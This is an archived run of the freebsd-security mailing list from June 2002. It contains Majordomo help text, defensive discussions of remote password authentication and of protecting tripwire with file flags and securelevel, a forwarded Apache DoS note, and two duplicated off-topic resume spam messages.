END OF COMMANDS **** Help for Majordomo@FreeBSD.ORG: *********************************************************************** Majordomo can not process MIME or HTML. Please send only plain ASCII email to Majordomo. Thank you. *********************************************************************** This help message is being sent to you from the Majordomo mailing list management system at Majordomo@FreeBSD.ORG. This is version 1.94.4 of Majordomo. If you're familiar with mail servers, an advanced user's summary of Majordomo's commands appears at the end of this message. Majordomo is an automated system which allows users to subscribe and unsubscribe to mailing lists, and to retrieve files from list archives. You can interact with the Majordomo software by sending it commands in the body of mail messages addressed to "Majordomo@FreeBSD.ORG". Please do not put your commands on the subject line; Majordomo does not process commands in the subject line. You may put multiple Majordomo commands in the same mail message. Put each command on a line by itself. If you use a "signature block" at the end of your mail, Majordomo may mistakenly believe each line of your message is a command; you will then receive spurious error messages. To keep this from happening, either put a line starting with a hyphen ("-") before your signature, or put a line with just the word end on it in the same place. This will stop the Majordomo software from processing your signature as bad commands. Here are some of the things you can do using Majordomo: I. FINDING OUT WHICH LISTS ARE ON THIS SYSTEM To get a list of publicly-available mailing lists on this system, put the following line in the body of your mail message to Majordomo@FreeBSD.ORG: lists Each line will contain the name of a mailing list and a brief description of the list. To get more information about a particular list, use the "info" command, supplying the name of the list. For example, if the name of the list about which you wish information is "demo-list", you would put the line info demo-list in the body of the mail message. II. SUBSCRIBING TO A LIST Once you've determined that you wish to subscribe to one or more lists on this system, you can send commands to Majordomo to have it add you to the list, so you can begin receiving mailings. To receive list mail at the address from which you're sending your mail, simply say "subscribe" followed by the list's name: subscribe demo-list If for some reason you wish to have the mailings go to a different address (a friend's address, a specific other system on which you have an account, or an address which is more correct than the one that automatically appears in the "From:" header on the mail you send), you would add that address to the command. For instance, if you're sending a request from your work account, but wish to receive "demo-list" mail at your personal account (for which we will use "jqpublic@my-isp.com" as an example), you'd put the line subscribe demo-list jqpublic@my-isp.com in the mail message body. Based on configuration decisions made by the list owners, you may be added to the mailing list automatically. You may also receive notification that an authorization key is required for subscription. Another message will be sent to the address to be subscribed (which may or may not be the same as yours) containing the key, and directing the user to send a command found in that message back to Majordomo@FreeBSD.ORG. (This can be a bit of extra hassle, but it helps keep you from being swamped in extra email by someone who forged requests from your address.) You may also get a message that your subscription is being forwarded to the list owner for approval; some lists have waiting lists, or policies about who may subscribe. If your request is forwarded for approval, the list owner should contact you soon after your request. Upon subscribing, you should receive an introductory message, containing list policies and features. Save this message for future reference; it will also contain exact directions for unsubscribing. If you lose the intro mail and would like another copy of the policies, send this message to Majordomo@FreeBSD.ORG: intro demo-list (substituting, of course, the real name of your list for "demo-list"). III. UNSUBSCRIBING FROM MAILING LISTS Your original intro message contains the exact command which should be used to remove your address from the list. However, in most cases, you may simply send the command "unsubscribe" followed by the list name: unsubscribe demo-list (This command may fail if your provider has changed the way your address is shown in your mail.) To remove an address other than the one from which you're sending the request, give that address in the command: unsubscribe demo-list jqpublic@my-isp.com In either of these cases, you can tell Majordomo@FreeBSD.ORG to remove the address in question from all lists on this server by using "*" in place of the list name: unsubscribe * unsubscribe * jqpublic@my-isp.com IV. FINDING THE LISTS TO WHICH AN ADDRESS IS SUBSCRIBED To find the lists to which your address is subscribed, send this command in the body of a mail message to Majordomo@FreeBSD.ORG: which You can look for other addresses, or parts of an address, by specifying the text for which Majordomo should search. For instance, to find which users at my-isp.com are subscribed to which lists, you might send the command which my-isp.com Note that many list owners completely or fully disable the "which" command, considering it a privacy violation. V. FINDING OUT WHO'S SUBSCRIBED TO A LIST To get a list of the addresses on a particular list, you may use the "who" command, followed by the name of the list: who demo-list Note that many list owners allow only a list's subscribers to use the "who" command, or disable it completely, believing it to be a privacy violation. VI. RETRIEVING FILES FROM A LIST'S ARCHIVES Many list owners keep archives of files associated with a list. These may include: - back issues of the list - help files, user profiles, and other documents associated with the list - daily, monthly, or yearly archives for the list To find out if a list has any files associated with it, use the "index" command: index demo-list If you see files in which you're interested, you may retrieve them by using the "get" command and specifying the list name and archive filename. For instance, to retrieve the files called "profile.form" (presumably a form to fill out with your profile) and "demo-list.9611" (presumably the messages posted to the list in November 1996), you would put the lines get demo-list profile.form get demo-list demo-list.9611 in your mail to Majordomo@FreeBSD.ORG. VII. GETTING MORE HELP To contact a human site manager, send mail to postmaster@FreeBSD.ORG. To get another copy of this help message, send mail to Majordomo@FreeBSD.ORG with a line saying help in the message body. VIII. COMMAND SUMMARY FOR ADVANCED USERS In the description below items contained in []'s are optional. When providing the item, do not include the []'s around it. Items in angle brackets, such as
, are meta-symbols that should be replaced by appropriate text without the angle brackets. It understands the following commands: subscribe [
] Subscribe yourself (or
if specified) to the named . unsubscribe [
] Unsubscribe yourself (or
if specified) from the named . "unsubscribe *" will remove you (or
) from all lists. This _may not_ work if you have subscribed using multiple addresses. get Get a file related to . index Return an index of files you can "get" for . which [
] Find out which lists you (or
if specified) are on. who Find out who is on the named . info Retrieve the general introductory information for the named . intro Retrieve the introductory message sent to new users. Non-subscribers may not be able to retrieve this. lists Show the lists served by this Majordomo server. help Retrieve this message. end Stop processing commands (useful if your mailer adds a signature). Commands should be sent in the body of an email message to "Majordomo@FreeBSD.ORG". Multiple commands can be processed provided each occurs on a separate line. Commands in the "Subject:" line are NOT processed. If you have any questions or problems, please contact "Majordomo-Owner@FreeBSD.ORG". To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 2:35:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id ED37437B415 for ; Wed, 19 Jun 2002 02:35:10 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 7CD705361; Wed, 19 Jun 2002 11:35:08 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Eric F Crist" Cc: "'Ryan Thompson'" , Subject: Re: Password security References: <000c01c2174c$5a38f230$77fe180c@armageddon> From: Dag-Erling Smorgrav Date: 19 Jun 2002 11:35:06 +0200 In-Reply-To: <000c01c2174c$5a38f230$77fe180c@armageddon> Message-ID: Lines: 14 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Eric F Crist" writes: > Have you explored the idea of biometrics? It requires a piece of > hardware on each computer that is going to access the network, but the > way you're making your security requirements sound, the security benefit > is worth the cost. 1) Biometrics can't be used reliably for remote access. 2) I don't know of any currently available biometric authentication device that can't be easily fooled. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 2:40:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id ABB6737B40F for ; Wed, 19 Jun 2002 02:39:53 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 1D2CA5361; Wed, 19 Jun 2002 11:39:51 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Ryan Thompson Cc: freebsd-security@freebsd.org Subject: Re: Password security References: <20020618204711.I65632-100000@ren.sasknow.com> From: Dag-Erling Smorgrav Date: 19 Jun 2002 11:39:51 +0200 In-Reply-To: <20020618204711.I65632-100000@ren.sasknow.com> Message-ID: Lines: 15 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ryan Thompson writes: > So, given the limitations of remote access (from machines assumed to > be insecure), and some fairly dumb Windows clients, what are some > solutions to password security? You need a challenge/response-based authentication mechanism. If your users all have PDAs, you can use OPIE (provided you can find or write an OPIE calculator that will run on their PDAs); or you can use CRYPTOCard tokens. The server software runs on Windows and Linux (I'm working on getting the Linux version to run on FreeBSD); all you need on the FreeBSD side is pam_radius. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 2:50:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from maxlor.mine.nu (c-213-160-32-54.customer.ggaweb.ch [213.160.32.54]) by hub.freebsd.org (Postfix) with SMTP id DA2EB37B406 for ; Wed, 19 Jun 2002 02:50:51 -0700 (PDT) Received: (qmail 67203 invoked by uid 92); 19 Jun 2002 09:50:44 -0000 Received: from merlin.intranet (HELO ?10.0.0.16?) (10.0.0.16) by midgard.intranet with SMTP; 19 Jun 2002 09:50:44 -0000 Date: Wed, 19 Jun 2002 11:50:43 +0200 From: Maxlor To: "freebsd-security@FreeBSD.ORG" Subject: Re: preventing tampering with tripwire Message-ID: <2799555.1024487443@[10.0.0.16]> In-Reply-To: <27700541.1024450071@[10.0.0.16]> References: <27700541.1024450071@[10.0.0.16]> X-Mailer: Mulberry/2.2.1 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thank you guys for your answers. Let me just comment on a few things: Putting the tripwire binary on an external, read only drive doesn't help. As I mentioned, an attacker who gained root could simply unmount the disk and place a tampered copy into the mountpoint dir. I would only notice this if I happened to have a closer look at df *and* the attacker was nice enough not to modify df too. Similar with making MD5 hashes of the tripwire binary. The MD5 program could be modified to always generate the same hash for tripwire. Using an external machine for generating and saving the hashes would be ok, but this would either require handwork (create a ssh connection, start the hashing), or somehow making the file system available to this machine, which would imo create a bigger security hole than it tries to cover. Making the whole system read only would help, alas it's not possible since I actually need to use my machine :-) Having some tools (tripwire, MD5) on a floppy, and mounting and checking the files by hand would work, imo. Only problem is that this adds quite a bit of inconvenience, which would lead to me not doing it anymore when I get tired of it. I mean, it's simple - I just want a tripwire report in my Inbox when I wake up in the morning :-). So, what I did so far is this: - Setting the schg flag for /usr/local/sbin/tripwire, /etc/crontab and /usr/sbin/cron. I set the flag for the cron files too so an attacker doesn't just delete the crontab entry and add 'cat fakereport.txt' in its place :). - Change kern.securelevel to 1. This prevents modifying any file which has the schg flag set. The securelevel cannot be lowered without a reboot. I've got to think a bit about how preventing a lowering through rebooting... maybe schg'ing /etc/rc and /etc/rc.conf? I actually went so far as to schg /sbin, /bin, /usr/sbin and /usr/bin. These will only be changed on a make world, and I need to drop to single user mode for that anyway, so no inconvenience should be created through this while my executables gain some reliability. Why do I like this solution a lot? Even if my system was rooted, and the attacker had enough skills to replace each binary with a compromised version that would look the same to me, he couldn't do so without dropping to single user mode. And since he'd have to have physical access to the machine for that, I think I can say the machine gained some reasonable security against rootkits overall. Thanks again for all your thoughts. Greetings Maxlor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 4:48: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from UnitedStates.com (200-158-62-52.dsl.telesp.net.br [200.158.62.52]) by hub.freebsd.org (Postfix) with ESMTP id C294637B407 for ; Wed, 19 Jun 2002 04:47:29 -0700 (PDT) Message-ID: <222150-220026319114438290@UnitedStates.com> X-EM-Version: 6, 0, 1, 0 X-EM-Registration: #00F06206106618006920 X-Priority: 3 From: "" To: "security@freebsd.org" Subject: Curriculo - United States Date: Wed, 19 Jun 2002 08:44:38 -0300 MIME-Version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org BOM DIA !! = =20 POR FAVOR, ENCAMINHAR MEU CURRICULO PARA =C1REA DE RECURSOS HUMANOS E ENTR= AR EM CONTATO VIA TELEFONE MARKETING -dperegalli@hotmail=2Ecom=09dperegalli@hotmail=2Ecom=09=09dpereg= alli@hotmail=2Ecom=09=09dperegalli@hotmail=2Ecom Agrade=E7o antecipadamente, Domingo Peregalli Abella dperegalli@hotmail=2Ecom 2495 Briarcliff Rd Atlanta, GA- 30329 (404) 679-5662 dperegalli@hotmail=2Ecom OBJECTIVE A position in Marketing to enhance my academic education in order to grow = professionally=2E PROFESSIONAL EXPERIENCE Solid experience in sales, project management, strategic planning and mana= gement of business units=2E International experience, mainly in Brazil, bu= t also abroad=2E Leadership, communications and negotiation skills, can ad= apt to new functions and markets=2E Strategic vision which allows me to ch= ange paradigms under different enviroments=2E WORK EXPERIENCE AT&T May 2001- January 2002 Bilingual account representative responsible for handling 80-90 inbound an= d outbound calls a day=2E Notified the customers about new products and se= rvices that AT&T has to offer=2E Quickly closed the sales process using th= e pre-defined strategies=2E Full participation on the management project t= o find out if we were reaching our objectives=2E Looking4=2Ecom=2Ebr March 2000- February 2001 Responsible for the area of business resources, bids, RFPs, sales, marketi= ng, development of products and emerging markets for looking4=2E Organized= the sales team and implemented policies and processes for sales as well a= s different strategies for e-marketing=2E Completed several projects invol= ving the creation, promotion and implementation of new services for lookin= g4=2Ecom=2E I increased markets share and achieved, with the team, the pre= -defined strategic objectives=2E BCP Telecommunications January 1998- March 2000 This is a private company in the area of Wireless Telephony in Sao Paulo, = Brazil=2E Worked in Marketing, as a Business Consultant in the area of pro= motions and corporate sales=2E Received several promotions while participa= ting in conjunction with leaders in the industry of the Brazilian Market=2E= These promotions involved the marketing of products, brand consolidation = and contributed to the recognition of BCP as an emerging new company=2E As= such, we reached our target of two million, three hundred thousand custom= ers in two years=2E Bioservice WRP-Johnson & Johnson Brazil June 1996- January 1998 Served as a commercial representative and responsible for the restructurin= g of a small sales team=2E Introduced new processes in sales and marketing= as well as diversifying the segments=2E Created an emerging markets plan = with objectives and targets not only for the Brazilian Market but foreign = markets as well=2E These included Chile, Argentina and Bolivia=2E EDUCATION Bachelor of Social Sciences Major in International Relations University: Pontificia Catolica de Sao Paulo, Brazil AA in Marketing ORT University Montevideo, Uruguay LANGUAGES Fluent in Spanish=2E (Native of Uruguay) Fluent in Portuguese=2E (Lived in Brazil from 1996-2000) English=2E San Francisco University (Center for English Studies/TOEFL) OTHERS Office 2000 Internet ESPANHOL !! Domingo Peregalli Abella 2495 Briarcliff Rd=20 Atlanta, GA- 30329 (404) 679-5662 OBJETIVO Agregar conceitos de Marketing a minha formacao academica e assim desenvol= ver-me profissionalmente=2E EXPERIENCIA PROFISSIONAL Solida experiencia numa serie de funcoes nas areas de vendas, gerencia de = projetos, marketing, gerencia de produtos, planejamento estrategico e gere= ncia geral de unidades de negocios=2E Experiencia internacional, capacidad= e de lideranca, habilidades de negociacao e comunicacao, adaptacao a novas= funcoes e mercados, visao estrategica que me permite mudar paradigmas em = diferentes segmentos de negocios=2E EXPERIENCIA DE TRABALHO AT&T Maio 2001- Presente Representante de contas bilingues, responsavel pelo atendimento ao cliente= , informa-los sobre novos produtos e servicos que a AT&T tem a oferecer=2E= Rapido fechamento no processo de vendas usando as estrategias pre-definid= as=2E Completa participacao gerencial no projeto na identificacao dos obje= tivos e se eles estavan sendo atingidos pela equipe de vendas=2E Looking4=2Ecom=2Ebr Marco 2000- Fevereiro 2001 Responsavel por vendas, marketing, criacao de produtos e mercados emergent= es para looking4=2E Organizei a equipe de vendas e implementei politicas e= procesos em vendas assim como tambem diferentes estrategias para e-market= ing=2E Completei distintos projetos envolvendo a criacao, promocao e imple= mentacao de novos servicos para looking4=2Ecom=2E Incrementei a participac= ao no mercado e atendi, junto com a equipe, os objetivos de vendas pre-est= abelecidos=2E BCP Telecomunicaciones Janeiro 1998- Marco 2000 Empresa privada na area de telefonia celular em Sao Paulo, Brasil=2E Traba= lhei em Marketing, como Consultor de Negocios no setor de promocoes e vend= as corporativas=2E Recibi diferentes promocoes junto a empresas lideres na= industria no mercado brasileiro=2E Estas promocoes incluiram o marketing = do produto, consolidacao da marca e contribui no reconhecimento da BCP com= o uma nova e emergente companhia=2E Como tal, nos alcancamos nosso objetiv= o de dois milhoes e trecentos mil clientes em dois anos=2E Johnson & Johnson Brasil Junho 1996- Janeiro 1998 Servi como representante comercial e fui responsavel pela reestruturacao d= e uma pequena equipe de vendas=2E Implementei novos processos em vendas e = marketing e tambem diversifiquei os segmentos=2E Ajudei na criacao e impla= ntacao de um potencial plano de mercado com objetivos e estrategias nao so= mente para o mercado brasileiro como tambem para o mercado internacional, = esto inclui o Chile, a Argentina e a Bolivia=2E EDUCACAO Universidade de Ciencias Sociais Lic=2E em Relacoes Internacionais Universidade; Pontificia Catolica de Sao Paulo, Brasil Universidade ORT do Uruguai Lic=2E em Marketing IDIOMAS Fluente em Espanhol (Nativo do Uruguai) Fluente em Portugues (Morei no Brasil desde 1996-2000) Ingles=2E San Francisco University (Center for English Studies/TOEFL) OUTROS Office 2000 Internet=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 4:50:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from UnitedStates.com (200-158-62-52.dsl.telesp.net.br [200.158.62.52]) by hub.freebsd.org (Postfix) with ESMTP id 6385E37B400 for ; Wed, 19 Jun 2002 04:50:36 -0700 (PDT) Message-ID: <881865-220026319114744650@UnitedStates.com> X-EM-Version: 6, 0, 1, 0 X-EM-Registration: #00F06206106618006920 X-Priority: 3 From: "" To: "freebsd-security@freebsd.org" Subject: Curriculo - United States Date: Wed, 19 Jun 2002 08:47:44 -0300 MIME-Version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org BOM DIA !! = =20 POR FAVOR, ENCAMINHAR MEU CURRICULO PARA =C1REA DE RECURSOS HUMANOS E ENTR= AR EM CONTATO VIA TELEFONE MARKETING -dperegalli@hotmail=2Ecom=09dperegalli@hotmail=2Ecom=09=09dpereg= alli@hotmail=2Ecom=09=09dperegalli@hotmail=2Ecom Agrade=E7o antecipadamente, Domingo Peregalli Abella dperegalli@hotmail=2Ecom 2495 Briarcliff Rd Atlanta, GA- 30329 (404) 679-5662 dperegalli@hotmail=2Ecom OBJECTIVE A position in Marketing to enhance my academic education in order to grow = professionally=2E PROFESSIONAL EXPERIENCE Solid experience in sales, project management, strategic planning and mana= gement of business units=2E International experience, mainly in Brazil, bu= t also abroad=2E Leadership, communications and negotiation skills, can ad= apt to new functions and markets=2E Strategic vision which allows me to ch= ange paradigms under different enviroments=2E WORK EXPERIENCE AT&T May 2001- January 2002 Bilingual account representative responsible for handling 80-90 inbound an= d outbound calls a day=2E Notified the customers about new products and se= rvices that AT&T has to offer=2E Quickly closed the sales process using th= e pre-defined strategies=2E Full participation on the management project t= o find out if we were reaching our objectives=2E Looking4=2Ecom=2Ebr March 2000- February 2001 Responsible for the area of business resources, bids, RFPs, sales, marketi= ng, development of products and emerging markets for looking4=2E Organized= the sales team and implemented policies and processes for sales as well a= s different strategies for e-marketing=2E Completed several projects invol= ving the creation, promotion and implementation of new services for lookin= g4=2Ecom=2E I increased markets share and achieved, with the team, the pre= -defined strategic objectives=2E BCP Telecommunications January 1998- March 2000 This is a private company in the area of Wireless Telephony in Sao Paulo, = Brazil=2E Worked in Marketing, as a Business Consultant in the area of pro= motions and corporate sales=2E Received several promotions while participa= ting in conjunction with leaders in the industry of the Brazilian Market=2E= These promotions involved the marketing of products, brand consolidation = and contributed to the recognition of BCP as an emerging new company=2E As= such, we reached our target of two million, three hundred thousand custom= ers in two years=2E Bioservice WRP-Johnson & Johnson Brazil June 1996- January 1998 Served as a commercial representative and responsible for the restructurin= g of a small sales team=2E Introduced new processes in sales and marketing= as well as diversifying the segments=2E Created an emerging markets plan = with objectives and targets not only for the Brazilian Market but foreign = markets as well=2E These included Chile, Argentina and Bolivia=2E EDUCATION Bachelor of Social Sciences Major in International Relations University: Pontificia Catolica de Sao Paulo, Brazil AA in Marketing ORT University Montevideo, Uruguay LANGUAGES Fluent in Spanish=2E (Native of Uruguay) Fluent in Portuguese=2E (Lived in Brazil from 1996-2000) English=2E San Francisco University (Center for English Studies/TOEFL) OTHERS Office 2000 Internet ESPANHOL !! Domingo Peregalli Abella 2495 Briarcliff Rd=20 Atlanta, GA- 30329 (404) 679-5662 OBJETIVO Agregar conceitos de Marketing a minha formacao academica e assim desenvol= ver-me profissionalmente=2E EXPERIENCIA PROFISSIONAL Solida experiencia numa serie de funcoes nas areas de vendas, gerencia de = projetos, marketing, gerencia de produtos, planejamento estrategico e gere= ncia geral de unidades de negocios=2E Experiencia internacional, capacidad= e de lideranca, habilidades de negociacao e comunicacao, adaptacao a novas= funcoes e mercados, visao estrategica que me permite mudar paradigmas em = diferentes segmentos de negocios=2E EXPERIENCIA DE TRABALHO AT&T Maio 2001- Presente Representante de contas bilingues, responsavel pelo atendimento ao cliente= , informa-los sobre novos produtos e servicos que a AT&T tem a oferecer=2E= Rapido fechamento no processo de vendas usando as estrategias pre-definid= as=2E Completa participacao gerencial no projeto na identificacao dos obje= tivos e se eles estavan sendo atingidos pela equipe de vendas=2E Looking4=2Ecom=2Ebr Marco 2000- Fevereiro 2001 Responsavel por vendas, marketing, criacao de produtos e mercados emergent= es para looking4=2E Organizei a equipe de vendas e implementei politicas e= procesos em vendas assim como tambem diferentes estrategias para e-market= ing=2E Completei distintos projetos envolvendo a criacao, promocao e imple= mentacao de novos servicos para looking4=2Ecom=2E Incrementei a participac= ao no mercado e atendi, junto com a equipe, os objetivos de vendas pre-est= abelecidos=2E BCP Telecomunicaciones Janeiro 1998- Marco 2000 Empresa privada na area de telefonia celular em Sao Paulo, Brasil=2E Traba= lhei em Marketing, como Consultor de Negocios no setor de promocoes e vend= as corporativas=2E Recibi diferentes promocoes junto a empresas lideres na= industria no mercado brasileiro=2E Estas promocoes incluiram o marketing = do produto, consolidacao da marca e contribui no reconhecimento da BCP com= o uma nova e emergente companhia=2E Como tal, nos alcancamos nosso objetiv= o de dois milhoes e trecentos mil clientes em dois anos=2E Johnson & Johnson Brasil Junho 1996- Janeiro 1998 Servi como representante comercial e fui responsavel pela reestruturacao d= e uma pequena equipe de vendas=2E Implementei novos processos em vendas e = marketing e tambem diversifiquei os segmentos=2E Ajudei na criacao e impla= ntacao de um potencial plano de mercado com objetivos e estrategias nao so= mente para o mercado brasileiro como tambem para o mercado internacional, = esto inclui o Chile, a Argentina e a Bolivia=2E EDUCACAO Universidade de Ciencias Sociais Lic=2E em Relacoes Internacionais Universidade; Pontificia Catolica de Sao Paulo, Brasil Universidade ORT do Uruguai Lic=2E em Marketing IDIOMAS Fluente em Espanhol (Nativo do Uruguai) Fluente em Portugues (Morei no Brasil desde 1996-2000) Ingles=2E San Francisco University (Center for English Studies/TOEFL) OUTROS Office 2000 Internet=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 5:18:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by hub.freebsd.org (Postfix) with ESMTP id 7152B37B40D for ; Wed, 19 Jun 2002 05:18:18 -0700 (PDT) Received: (qmail 22914 invoked by uid 1000); 19 Jun 2002 12:18:12 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 19 Jun 2002 12:18:12 -0000 Date: Wed, 19 Jun 2002 05:18:11 -0700 (PDT) From: Jason Stone X-X-Sender: To: Maxlor Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: preventing tampering with tripwire In-Reply-To: <2799555.1024487443@[10.0.0.16]> Message-ID: <20020619050434.Q19920-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > Why do I like this solution a lot? Even if my system was rooted, and > the attacker had enough skills to replace each binary with a > compromised version that would look the same to me, he couldn't do so > without dropping to single user mode. And since he'd have to have > physical access to the machine for that, I think I can say the machine > gained some reasonable security against rootkits overall. A couple of random thoughts: 1) All the 31337 rootkits use kld's and don't bother with trojans, and, as has already been pointed out on this list, /modules/* are _not_ set schg bu default. 2) FYI, at least two independent groups have implemented the equivalent of tripwire in the kernel - the kernel does something like read in the sha1 sums at boot time and then every time a binary is run, its sha1 is computed and, if it doesn't match the in-memory sha1 from boot time, the binary will not be run. http://www.trojanproof.org/ is one project and the other I don't remember, but a quick slashdot or google search would turn it up I'm sure. -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE9EHaEswXMWWtptckRAoD9AKDB3JZ5z7KcjXd3cfHuvdD0FUVTawCgnyeS p25Ezk9d56oHVCKrsGK2h5k= =3ABc -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 5:31:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from sdns.kv.ukrtel.net (sdns.kv.ukrtel.net [195.5.27.246]) by hub.freebsd.org (Postfix) with ESMTP id 9BED337B40F; Wed, 19 Jun 2002 05:31:24 -0700 (PDT) Received: from vega.vega.com (195.5.51.243 [195.5.51.243]) by sdns.kv.ukrtel.net with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id M7SJ6RB0; Wed, 19 Jun 2002 15:33:29 +0300 Received: from FreeBSD.org (big_brother.vega.com [192.168.1.1]) by vega.vega.com (8.11.6/8.11.3) with ESMTP id g5JCVNb31573; Wed, 19 Jun 2002 15:31:23 +0300 (EEST) (envelope-from sobomax@FreeBSD.org) Message-ID: <3D1079D3.2BCF833F@FreeBSD.org> Date: Wed, 19 Jun 2002 15:32:19 +0300 From: Maxim Sobolev Organization: Vega International Capital X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en,uk,ru MIME-Version: 1.0 To: nectar@FreeBSD.org Cc: security@FreeBSD.org, Alexandr Kovalenko Subject: [Fwd: Russian Apache is not vulnerable to recent DoS] Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Redirect to a proper place. -------- Original Message -------- Subject: Russian Apache is not vulnerable to recent DoS Date: Wed, 19 Jun 2002 15:01:11 +0300 From: Alexandr Kovalenko To: freebsd-ports@FreeBSD.org Russian Apache is not vulnerable to recent apache vulnerability, because it does not use code, which causes it. Please, remove FORBIDDEN from russian/apach13 and russian/apache13-ssl. Thank you. -- NEVE-RIPE Ukrainian FreeBSD User Group http://uafug.org.ua/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 6:16:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from infinity.aesredfish.net (ns1.aesredfish.net [65.168.0.12]) by hub.freebsd.org (Postfix) with ESMTP id 28FFF37B412 for ; Wed, 19 Jun 2002 06:16:09 -0700 (PDT) Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com [65.168.1.181]) by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id g5JDFsr20990; Wed, 19 Jun 2002 09:15:55 -0400 Message-ID: <3D108570.70409@potentialtech.com> Date: Wed, 19 Jun 2002 09:21:52 -0400 From: Bill Moran User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020502 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Ryan Thompson Cc: freebsd-security@freebsd.org Subject: Re: Password security References: <20020618204711.I65632-100000@ren.sasknow.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There were a lot of excellent responses, I'm going to add my $.02. Hopefully it will be helpful. Ryan Thompson wrote: > My staffers are using plain old passwords for logins. ALL logins are > via SSH from various platforms, using passwords. Some are logging in > from Windows clients that don't support much else. And, on the > security/convenience continuum, I won't have much of a network to > secure if nobody gets any work done. :-) > > I'm well aware of the inherent insecurity of what your average human > can remember. It's currently a weak link for us, so it is one aspect > of our security that I would like to improve. So, for the purposes of > this message, please assume all other avenues have been secured. ;-) There are some tricks to improve the "average human's" 